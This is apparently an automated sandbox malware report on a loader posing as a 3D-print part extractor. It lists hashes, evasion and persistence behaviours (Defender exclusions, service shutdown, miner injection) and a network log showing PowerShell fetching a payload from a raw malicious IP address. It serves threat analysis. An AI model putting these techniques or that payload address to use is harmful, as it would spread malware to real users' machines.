File name:

Extract 3D Print Part All.exe

Full analysis: https://app.any.run/tasks/e95be3c1-7c03-4f24-888d-5d9270286035
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 14, 2025, 16:17:57
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
miner
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 8 sections
MD5:

57F715859355BD66E6CE1F02BA7E3429

SHA1:

66240C3E10406D82BA9ED6DB48D90C40475B9170

SHA256:

E3FFF8FDB26FFF7F7B7A7E8FE3DA1A48F85D57DA0445A58943941BBB82AFA6C2

SSDEEP:

12288:U519i8Q8roXav8fOskHQQSU18WiXcXgazJ3P6KWLOAN4Oj:U55kVmHQ6gazJfPAN4Oj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 6272)
      • powershell.exe (PID: 6388)
      • sdfg5fee.exe (PID: 5728)
      • Bara.exe (PID: 7328)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6272)
      • powershell.exe (PID: 6388)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)

    • Uses Task Scheduler to autorun other applications

      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)

    • Adds extension to the Windows Defender exclusion list

      • liu5jhg.exe (PID: 5572)
      • kaptsegthwf.exe (PID: 7092)

    • Uninstalls Malicious Software Removal Tool (MRT)

      • cmd.exe (PID: 6876)
      • cmd.exe (PID: 5592)

    • Application was injected by another process

      • winlogon.exe (PID: 684)
      • lsass.exe (PID: 760)
      • svchost.exe (PID: 320)
      • svchost.exe (PID: 1076)
      • dwm.exe (PID: 912)
      • svchost.exe (PID: 1068)
      • svchost.exe (PID: 1260)
      • svchost.exe (PID: 1316)
      • svchost.exe (PID: 1268)
      • svchost.exe (PID: 1276)
      • svchost.exe (PID: 1776)
      • svchost.exe (PID: 2372)
      • svchost.exe (PID: 1972)
      • svchost.exe (PID: 1768)
      • svchost.exe (PID: 1452)
      • svchost.exe (PID: 1500)
      • svchost.exe (PID: 1660)
      • svchost.exe (PID: 1784)
      • svchost.exe (PID: 1908)
      • svchost.exe (PID: 1880)
      • svchost.exe (PID: 2064)
      • svchost.exe (PID: 1980)
      • svchost.exe (PID: 2364)
      • svchost.exe (PID: 2192)
      • svchost.exe (PID: 2272)
      • svchost.exe (PID: 1364)
      • svchost.exe (PID: 1424)
      • svchost.exe (PID: 1564)
      • svchost.exe (PID: 2852)
      • svchost.exe (PID: 2748)
      • svchost.exe (PID: 2500)
      • svchost.exe (PID: 2892)
      • svchost.exe (PID: 2816)
      • svchost.exe (PID: 3016)
      • svchost.exe (PID: 2920)
      • svchost.exe (PID: 2288)
      • svchost.exe (PID: 3704)
      • svchost.exe (PID: 2944)
      • svchost.exe (PID: 2360)
      • svchost.exe (PID: 2256)
      • svchost.exe (PID: 2660)
      • svchost.exe (PID: 3592)
      • svchost.exe (PID: 2340)
      • spoolsv.exe (PID: 2652)
      • OfficeClickToRun.exe (PID: 2884)
      • svchost.exe (PID: 3668)
      • svchost.exe (PID: 4168)
      • dasHost.exe (PID: 3896)
      • sihost.exe (PID: 1712)
      • svchost.exe (PID: 3160)
      • explorer.exe (PID: 4488)
      • svchost.exe (PID: 4436)
      • svchost.exe (PID: 4696)
      • ctfmon.exe (PID: 4268)
      • svchost.exe (PID: 4176)
      • RuntimeBroker.exe (PID: 4676)
      • dllhost.exe (PID: 5164)
      • RuntimeBroker.exe (PID: 4960)
      • svchost.exe (PID: 3600)
      • svchost.exe (PID: 3824)
      • svchost.exe (PID: 3164)
      • svchost.exe (PID: 4000)
      • svchost.exe (PID: 2952)
      • UserOOBEBroker.exe (PID: 3004)
      • ApplicationFrameHost.exe (PID: 6108)
      • svchost.exe (PID: 812)
      • svchost.exe (PID: 3976)
      • svchost.exe (PID: 4456)
      • MoUsoCoreWorker.exe (PID: 4712)
      • svchost.exe (PID: 1764)
      • svchost.exe (PID: 4200)
      • svchost.exe (PID: 1340)
      • uhssvc.exe (PID: 2908)
      • svchost.exe (PID: 3056)
      • svchost.exe (PID: 376)
      • svchost.exe (PID: 1176)
      • svchost.exe (PID: 1888)
      • dllhost.exe (PID: 5904)
      • RuntimeBroker.exe (PID: 5820)
      • RuntimeBroker.exe (PID: 6944)
      • svchost.exe (PID: 5968)
      • svchost.exe (PID: 1540)
      • dllhost.exe (PID: 1816)
      • svchost.exe (PID: 4980)
      • WmiPrvSE.exe (PID: 4308)
      • WmiPrvSE.exe (PID: 6352)
      • dllhost.exe (PID: 7384)
      • dllhost.exe (PID: 7904)

    • Runs injected code in another process

      • dialer.exe (PID: 6408)
      • dialer.exe (PID: 6444)
      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 6832)

    • MINER has been detected (SURICATA)

      • dialer.exe (PID: 7208)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 6832)

  • SUSPICIOUS

    • Starts NET.EXE to display or manage information about active sessions

      • cmd.exe (PID: 6272)
      • net.exe (PID: 6340)

    • Executing commands from a ".bat" file

      • Extract 3D Print Part All.exe (PID: 6172)
      • cmd.exe (PID: 6272)

    • Starts CMD.EXE for commands execution

      • Extract 3D Print Part All.exe (PID: 6172)
      • cmd.exe (PID: 6272)
      • liu5jhg.exe (PID: 5572)
      • sdfg5fee.exe (PID: 5728)
      • kaptsegthwf.exe (PID: 7092)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6272)
      • powershell.exe (PID: 6388)
      • sdfg5fee.exe (PID: 5728)
      • liu5jhg.exe (PID: 5572)
      • kaptsegthwf.exe (PID: 7092)
      • Bara.exe (PID: 7328)

    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)

    • Likely accesses (executes) a file from the Public directory

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)
      • Okfgjrg5d8gt.exe (PID: 2676)
      • liu5jhg.exe (PID: 5572)
      • schtasks.exe (PID: 3840)
      • sdfg5fee.exe (PID: 5728)
      • iujtyjythyt.exe (PID: 5032)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6272)
      • powershell.exe (PID: 6388)
      • liu5jhg.exe (PID: 5572)
      • sdfg5fee.exe (PID: 5728)
      • kaptsegthwf.exe (PID: 7092)
      • svchost.exe (PID: 1276)
      • Bara.exe (PID: 7328)

    • Starts process via Powershell

      • powershell.exe (PID: 6388)

    • Manipulates environment variables

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 6424)
      • powershell.exe (PID: 6476)
      • powershell.exe (PID: 6784)
      • powershell.exe (PID: 7952)

    • Reads security settings of Internet Explorer

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)

    • Reads the date of Windows installation

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)

    • Found IP address in command line

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)

    • Application launched itself

      • powershell.exe (PID: 6388)
      • cmd.exe (PID: 6272)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 6388)

    • Connects to the server without a host name

      • powershell.exe (PID: 6644)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 6644)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6644)
      • Okfgjrg5d8gt.exe (PID: 2676)
      • iujtyjythyt.exe (PID: 5032)
      • liu5jhg.exe (PID: 5572)
      • sdfg5fee.exe (PID: 5728)
      • kaptsegthwf.exe (PID: 7092)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6644)

    • Starts itself from another location

      • iujtyjythyt.exe (PID: 5032)

    • The process checks if current user has admin rights

      • sdfg5fee.exe (PID: 5728)

    • Script adds exclusion extension to Windows Defender

      • liu5jhg.exe (PID: 5572)
      • kaptsegthwf.exe (PID: 7092)

    • Connects to unusual port

      • Client.exe (PID: 3820)
      • dialer.exe (PID: 7208)

    • Stops a currently running service

      • sc.exe (PID: 2212)
      • sc.exe (PID: 6676)
      • sc.exe (PID: 3288)
      • sc.exe (PID: 6828)
      • sc.exe (PID: 4076)
      • sc.exe (PID: 6284)
      • sc.exe (PID: 4684)
      • sc.exe (PID: 4740)
      • sc.exe (PID: 4984)
      • sc.exe (PID: 6212)
      • sc.exe (PID: 6304)
      • sc.exe (PID: 6028)
      • sc.exe (PID: 5680)
      • sc.exe (PID: 6476)
      • sc.exe (PID: 640)
      • sc.exe (PID: 2224)

    • Process uninstalls Windows update

      • wusa.exe (PID: 6804)
      • wusa.exe (PID: 6392)

    • Uses powercfg.exe to modify the power settings

      • cmd.exe (PID: 7152)
      • liu5jhg.exe (PID: 5572)
      • kaptsegthwf.exe (PID: 7092)

    • Starts SC.EXE for service management

      • liu5jhg.exe (PID: 5572)
      • cmd.exe (PID: 6960)
      • kaptsegthwf.exe (PID: 7092)

    • Windows service management via SC.EXE

      • sc.exe (PID: 536)
      • sc.exe (PID: 6768)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6960)

    • Creates a new Windows service

      • sc.exe (PID: 6268)

    • Executes as Windows Service

      • kaptsegthwf.exe (PID: 7092)

    • The process executes via Task Scheduler

      • powershell.exe (PID: 6832)
      • powershell.exe (PID: 6744)
      • Bara.exe (PID: 7328)

    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 6892)
      • powershell.exe (PID: 6460)

    • Crypto Currency Mining Activity Detected

      • dialer.exe (PID: 7208)

    • Drops a system driver (possible attempt to evade defenses)

      • kaptsegthwf.exe (PID: 7092)

  • INFO

    • Create files in a temporary directory

      • Extract 3D Print Part All.exe (PID: 6172)

    • Process checks computer location settings

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)

    • Checks supported languages

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)
      • liu5jhg.exe (PID: 5572)
      • sdfg5fee.exe (PID: 5728)
      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)
      • kaptsegthwf.exe (PID: 7092)

    • Reads the computer name

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)
      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)

    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 4488)
      • RuntimeBroker.exe (PID: 6944)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 6476)
      • powershell.exe (PID: 6424)
      • powershell.exe (PID: 6784)
      • powershell.exe (PID: 6892)

    • Disables trace logs

      • powershell.exe (PID: 6644)

    • Checks proxy server information

      • powershell.exe (PID: 6644)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 6424)
      • powershell.exe (PID: 6476)
      • powershell.exe (PID: 6784)

    • Reads the software policy settings

      • lsass.exe (PID: 760)

    • Reads Environment values

      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)

    • Reads the machine GUID from the registry

      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)

    • Creates files or folders in the user directory

      • iujtyjythyt.exe (PID: 5032)

    • Reads the time zone

      • WmiPrvSE.exe (PID: 6352)

    • Creates files in the program directory

      • liu5jhg.exe (PID: 5572)
      • MoUsoCoreWorker.exe (PID: 4712)
      • sdfg5fee.exe (PID: 5728)
      • svchost.exe (PID: 1076)

    • The sample compiled with japanese language support

      • kaptsegthwf.exe (PID: 7092)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:02:26 09:01:47+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.33
CodeSize: 288768
InitializedDataSize: 163328
UninitializedDataSize: -
EntryPoint: 0x32e60
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
235
Monitored processes
199
Malicious processes
103
Suspicious processes
4

Behavior graph

Click at the process to see the details
start extract 3d print part all.exe cmd.exe no specs conhost.exe no specs net.exe no specs net1.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs runtimebroker.exe wmiprvse.exe okfgjrg5d8gt.exe liu5jhg.exe sdfg5fee.exe iujtyjythyt.exe schtasks.exe no specs conhost.exe no specs client.exe schtasks.exe no specs conhost.exe no specs wmiprvse.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs sc.exe no specs conhost.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs powercfg.exe no specs wusa.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs powercfg.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs conhost.exe no specs powercfg.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs powercfg.exe no specs reg.exe no specs powercfg.exe no specs powercfg.exe no specs powercfg.exe no specs powercfg.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs dialer.exe no specs sc.exe no specs conhost.exe no specs reg.exe no specs sc.exe no specs conhost.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs conhost.exe no specs conhost.exe no specs kaptsegthwf.exe powershell.exe no specs conhost.exe no specs dialer.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs sc.exe no specs conhost.exe no specs conhost.exe no specs wusa.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs powercfg.exe no specs powercfg.exe no specs powercfg.exe no specs powercfg.exe no specs dialer.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs dialer.exe no specs #MINER dialer.exe schtasks.exe no specs bara.exe no specs dllhost.exe dllhost.exe powershell.exe no specs conhost.exe no specs svchost.exe svchost.exe winlogon.exe lsass.exe svchost.exe dwm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe sihost.exe svchost.exe svchost.exe svchost.exe svchost.exe dllhost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe extract 3d print part all.exe no specs svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe svchost.exe svchost.exe svchost.exe officeclicktorun.exe svchost.exe uhssvc.exe svchost.exe svchost.exe svchost.exe useroobebroker.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe dashost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe ctfmon.exe svchost.exe svchost.exe explorer.exe runtimebroker.exe svchost.exe mousocoreworker.exe runtimebroker.exe svchost.exe dllhost.exe runtimebroker.exe dllhost.exe svchost.exe applicationframehost.exe

Process information

PID
CMD
Path
Indicators
Parent process
204\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowercfg.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
204C:\WINDOWS\system32\dialer.exeC:\Windows\System32\dialer.exesdfg5fee.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Windows Phone Dialer
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\18d6.tmp
c:\windows\system32\dialer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
320C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p -s LSMC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\lsm.dll
c:\windows\system32\msvcrt.dll
376C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHostC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
536C:\WINDOWS\system32\sc.exe delete "WAGDKRVZ"C:\Windows\System32\sc.exeliu5jhg.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Service Control Manager Configuration Tool
Exit code:
1060
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
624\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exesc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
640C:\WINDOWS\system32\sc.exe stop dosvcC:\Windows\System32\sc.exekaptsegthwf.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Exit code:
1062
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
684winlogon.exeC:\Windows\System32\winlogon.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Logon Application
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\winlogon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
760C:\WINDOWS\system32\lsass.exeC:\Windows\System32\lsass.exe
wininit.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Local Security Authority Process
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\lsass.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\lsasrv.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sechost.dll
812C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvcC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
Total events
62 746
Read events
62 509
Write events
168
Delete events
69

Modification events

(PID) Process:(1276) svchost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C2AF3602-9179-4BAE-85B3-74A4EF5CF51F}
Operation:writeName:DynamicInfo
Value:
03000000BDCB09F80A59DA0186AED304FC7EDB010000000000000000CEF1EF07FC7EDB01
(PID) Process:(1276) svchost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4671B5C1-A383-4428-A45A-8D348E4CB873}
Operation:writeName:DynamicInfo
Value:
030000009F7DFD23AAB7D8010FF3C204FC7EDB010000000000000000FB2DCF09FC7EDB01
(PID) Process:(4268) ctfmon.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Input\TypingInsights
Operation:writeName:Insights
Value:
02000000071DE8C131CC8360A3D6D9C1330A686B165ABA2E235F5A5C
(PID) Process:(1340) svchost.exeKey:HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store
Operation:writeName:C:\Users\admin\AppData\Local\Temp\Extract 3D Print Part All.exe
Value:
534143500100000000000000070000002800000057A25D000000000001000000000000000000000A0021000050BB64EDDDACD5010000000000000000
(PID) Process:(1340) svchost.exeKey:\REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile
Operation:writeName:WritePermissionsCheck
Value:
1
(PID) Process:(1340) svchost.exeKey:\REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\PermissionsCheckTestKey
Operation:delete keyName:(default)
Value:
(PID) Process:(1340) svchost.exeKey:\REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\extract 3d print|a3de61c6c1be9498
Operation:writeName:ProgramId
Value:
00065d5bacd373144b822b6dc26a4d06c9770000ffff
(PID) Process:(1340) svchost.exeKey:\REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\extract 3d print|a3de61c6c1be9498
Operation:writeName:FileId
Value:
000066240c3e10406d82ba9ed6db48d90c40475b9170
(PID) Process:(1340) svchost.exeKey:\REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\extract 3d print|a3de61c6c1be9498
Operation:writeName:LowerCaseLongPath
Value:
c:\users\admin\appdata\local\temp\extract 3d print part all.exe
(PID) Process:(1340) svchost.exeKey:\REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\extract 3d print|a3de61c6c1be9498
Operation:writeName:LongPathHash
Value:
extract 3d print|a3de61c6c1be9498
Executable files
9
Suspicious files
61
Text files
36
Unknown types
0

Dropped files

PID
Process
Filename
Type
6172Extract 3D Print Part All.exeC:\Users\admin\AppData\Local\Temp\auto14.battext
MD5:13314406B39C2CD68C21F73FB5142E75
SHA256:216CF8A41A1A8A76E53AEEA94F5DBC090B7302656AA44B46360CA8BD1D65C0E5
6172Extract 3D Print Part All.exeC:\Users\admin\AppData\Local\Temp\bolt_25x8.stltext
MD5:43772B7013656C84EF5E7A69E830F0CE
SHA256:0C3427A2F023F4DE599ABE1CDA57F299535B395CD56CF8DFE3E61BF5840AC0B7
4488explorer.exeC:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datbinary
MD5:E49C56350AEDF784BFE00E444B879672
SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
6172Extract 3D Print Part All.exeC:\Users\admin\AppData\Local\Temp\washer_1_x_8.5.stltext
MD5:A1E7F53CED2F9B191CF640D378CFBF47
SHA256:3D4BA8534F8D20736B3BB956E5141113B60391F6D7224620A88333A1C18253AE
1768svchost.exeC:\Windows\Prefetch\EXTRACT 3D PRINT PART ALL.EXE-C687B749.pfbinary
MD5:274A80858C0364255B9A63AFF5B10318
SHA256:3D0D09663C287862DA245CE3B102C73A47300BD7D25ECA6439E478157C8E7B4C
5164dllhost.exeC:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\V01.chkbinary
MD5:9628937F1D0F7449C2BB18557D32ABBC
SHA256:B4F5910E457A3718E24C74BC67529F799CE881225673F938E9462A76F90C40C3
6172Extract 3D Print Part All.exeC:\Users\admin\AppData\Local\Temp\wingnut_6x9.stltext
MD5:09A76AB0D924B97201AEC851C2C589CC
SHA256:3B7FCAE304933F6FAAB1DE4218476FB439287E035EAA94247B72F0DF1285D278
6172Extract 3D Print Part All.exeC:\Users\admin\AppData\Local\Temp\Nut_Job.scadtext
MD5:97C6A47E07BD92F7236C783D40053793
SHA256:1623961BB2F76E2EBD3685377A9D94ECC5ACB95C7B3451A5575F93F8BBAA7C42
6172Extract 3D Print Part All.exeC:\Users\admin\AppData\Local\Temp\NutJoiner18x9.stltext
MD5:8FA949B46484C44508E10E250ACBD7E2
SHA256:A3BA0B63FEB4E766E3B214ED53D911198C2DB44CA6431175DC6D4588EC7FE22D
1768svchost.exeC:\Windows\Prefetch\NET.EXE-DF44F913.pfbinary
MD5:79F497C83C7A4BD9C5234D1DF2D1DE55
SHA256:03655BE0B5900A57D2878976A40092154872F684C1D2FDEC0CB8A2858C49564B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
68
DNS requests
18
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.180:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2508
svchost.exe
GET
200
23.48.23.180:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.19.217.218:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2508
svchost.exe
GET
200
2.19.217.218:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.67.160.244:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
23.67.160.244:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6644
powershell.exe
GET
200
185.148.3.216:80
http://185.148.3.216/Okfgjrg5d8gt
unknown
malicious
6192
SIHClient.exe
GET
200
92.123.22.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6560
backgroundTaskHost.exe
GET
200
2.23.77.188:80
